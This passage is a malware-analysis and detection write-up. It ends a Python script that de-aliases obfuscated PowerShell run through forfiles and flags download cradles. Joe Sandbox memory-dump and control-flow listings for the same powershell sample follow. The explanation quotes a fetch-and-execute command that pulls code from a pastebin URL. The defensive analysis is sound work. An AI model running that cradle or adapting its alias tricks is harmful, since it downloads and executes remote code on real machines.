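    rewritten = TOKEN.sub(lambda m: canonical(m.group(0)), "; ".join(body))
    return rewritten, resolved


def classify(cmdline, canonical_script, aliases):
    """Name the behaviours a detection engineer would alert on."""
    findings = []
    m = re.match(r'"?([^"\s]+)', cmdline)
    image = m.group(1).rsplit("\\", 1)[-1].lower() if m else ""
    if image == "forfiles.exe" and "/c" in cmdline.lower():
        findings.append("lolbin-proxy")        # forfiles /c launching a child
    low = canonical_script.lower()
    if "invoke-expression" in low and (
            "invoke-webrequest" in low or "invoke-restmethod" in low):
        findings.append("download-cradle")     # iex(iwr ...) once de-aliased
    if any(t in BUILTIN_ALIASES.values() for t in aliases.values()):
        findings.append("alias-obfuscation")   # iex/iwr reached via a renamed alias
    if "pastebin.com" in low:
        findings.append("paste-site")
    return findings


def analyze(cmdline, env=None):
    script = extract_script(cmdline)
    canonical_script, aliases = resolve_aliases(script, env)
    return {"script": script, "canonical": canonical_script, "aliases": aliases,
            "findings": classify(cmdline, canonical_script, aliases)}


if __name__ == "__main__":
    for line in (FORFILES_CMD, POWERSHELL_CMD, BENIGN_CMD):
        result = analyze(line)
        print(result["canonical"] or "(no -command)", result["findings"])
```

Run against the forfiles line, the script reduces to `Invoke-Expression(Invoke-WebRequest pastebin.com/raw/sA04Mwk2 -usebasicparsing)`, which is why a detection keyed on the literal strings `iex` or `iwr` misses this sample while one that de-aliases first does not. Treat the alias map as a signal of its own: a user-defined alias resolving to Invoke-Expression or Invoke-WebRequest is rare in legitimate automation.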
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2714543790.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffb4ae10000_vF20HtY4a4.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8e6a53b6ba18cee65ed171cc4bfc943f2a3c844025ce29c94b6cb2c9a8796f91
                                              • Instruction ID: 0d8d7b4bcd1140e6cea762b15ebf07b0e6d185e12858ad419fb56d731decdaa1
                                              • Opcode Fuzzy Hash: 8e6a53b6ba18cee65ed171cc4bfc943f2a3c844025ce29c94b6cb2c9a8796f91
                                              • Instruction Fuzzy Hash: F76186A164EA960FE396BF7CC8562BA7FD0EF86260B2540FED099C7293CC1C4C468341

                                              Execution Graph

                                              Execution Coverage:3.2%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:0%
                                              Total number of Nodes:3
                                              Total number of Limit Nodes:0
                                              Execution graph: 7ffb4ae3663a -> 7ffb4ae36c50 (LoadLibraryExW) -> 7ffb4ae36cdd

                                              Control-flow Graph

                                              Control-flow graph (executed and not-executed blocks): basic blocks 7ffb4ae2b966-7ffb4ae2be23, one call to 7ffb4ae2be24.
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2017364633.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_7ffb4ae20000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f33b807f50768f8d482bec949121874bf39ccaa03e512f07fc7c5376a724d16b
                                              • Instruction ID: b4722da2b5cdef7c637fd698cd2be6de361af44d76e3c9d6703f555162b96450
                                              • Opcode Fuzzy Hash: f33b807f50768f8d482bec949121874bf39ccaa03e512f07fc7c5376a724d16b
                                              • Instruction Fuzzy Hash: 91F1C67150CA4D8FEBA9EF28C8567E937D1FF68310F1442AAE85DC7295CF3499418B82

                                              Control-flow Graph

                                              Control-flow graph (executed and not-executed blocks): basic blocks 7ffb4ae2c712-7ffb4ae2cb9f, one call to 7ffb4ae2cba0.
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2017364633.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_7ffb4ae20000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 43161e74c827c7dfd2b1eaff2829583c2f9bc7115a4353c54585b3afcdf119e8
                                              • Instruction ID: 1f491268c9cce1c29c4171490e570336b926850da032d79950c23dfaa1cdd199
                                              • Opcode Fuzzy Hash: 43161e74c827c7dfd2b1eaff2829583c2f9bc7115a4353c54585b3afcdf119e8
                                              • Instruction Fuzzy Hash: 0AE1D47190CA4D8FEBA8EF38C8557E977D1FF98310F24826AD85DC7291CE74A8418782

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2017771849.00007FFB4AEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_7ffb4aef0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 1@_L$6=!
                                              • API String ID: 0-1745356557
                                              • Opcode ID: c4a8e8b94230ed36a5aa6a729e40568207c52d46bfadfebff8c7a5c6fc0af778
                                              • Instruction ID: b9028eedec39ce9a937b880e20448ee8cb6691fe45e45d232cc11b201b078bf2
                                              • Opcode Fuzzy Hash: c4a8e8b94230ed36a5aa6a729e40568207c52d46bfadfebff8c7a5c6fc0af778
                                              • Instruction Fuzzy Hash: 5FC15571A0EB855FE79ABF3888599657BE1EF5621072901FFD049CB1A3E914AC0AC381

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2017771849.00007FFB4AEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_7ffb4aef0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 1@_L$6=!
                                              • API String ID: 0-1745356557
                                              • Opcode ID: c05837d952e837eb21e332957a1c61216d8b8c40a69f23d16ec7f5182105c828
                                              • Instruction ID: 6019bbc3e33b17b3cfc1635f0e397d77f7ab6c6835bc79b71b245b88af13f589
                                              • Opcode Fuzzy Hash: c05837d952e837eb21e332957a1c61216d8b8c40a69f23d16ec7f5182105c828
                                              • Instruction Fuzzy Hash: 177134B1A0DB455FEB99FE38C4868297BE1FF9531072501FEE44AC71A2E924EC46C781

                                              Control-flow Graph

                                              Control-flow graph (executed and not-executed blocks): basic blocks 7ffb4ae3663a-7ffb4ae36d0a; LoadLibraryExW is called from block 7ffb4ae36ca9-7ffb4ae36cdb.
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2017364633.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_7ffb4ae20000_powershell.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: de322a399273096f2b8ec14a74f24a428ddee0c141f48ee5e0db5ba9131d699e
                                              • Instruction ID: e9a49a68fc53da8d1f4096e4d0666a98f4e5c952898823fc90dc386fa59f8486
                                              • Opcode Fuzzy Hash: de322a399273096f2b8ec14a74f24a428ddee0c141f48ee5e0db5ba9131d699e
                                              • Instruction Fuzzy Hash: 8321A27190CA1C9FDB58EF6CD449BFABBE0FB65311F10822ED009D3251DB71A4168B91

                                              Control-flow Graph

                                              Control-flow graph (executed and not-executed blocks): basic blocks 7ffb4aef33d5-7ffb4aef378b, no calls.
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2017771849.00007FFB4AEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_7ffb4aef0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 35a79e675f732dc7564dd71af7bcd4657712f3621c6a04527b136164f3c38fe0
                                              • Instruction ID: fdc0e3e03e4cbe16f82c5a1b779c364182d6503db712218b1c5a562596244539
                                              • Opcode Fuzzy Hash: 35a79e675f732dc7564dd71af7bcd4657712f3621c6a04527b136164f3c38fe0
                                              • Instruction Fuzzy Hash: CFD134A2A0EA8A5FE796FF78C8591F57F94FF56310F2800FAE46CC7193D91898058391
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2017364633.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_7ffb4ae20000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: "m$#m
                                              • API String ID: 0-3539297580
                                              • Opcode ID: fd45ec72305c68b106147be45fc53dfbeaa0c5beddeac0df6a1f0d4c009acc9c
                                              • Instruction ID: acbea605e56850a90e8dd4859cbfc2dccd42c6bc567208fcbe6d5cb1240861af
                                              • Opcode Fuzzy Hash: fd45ec72305c68b106147be45fc53dfbeaa0c5beddeac0df6a1f0d4c009acc9c
                                              • Instruction Fuzzy Hash: 45D124C3A0D26285E2123ABDF4520FC6B08DF85375B18C1F7DB9D990C78E4961AB52F6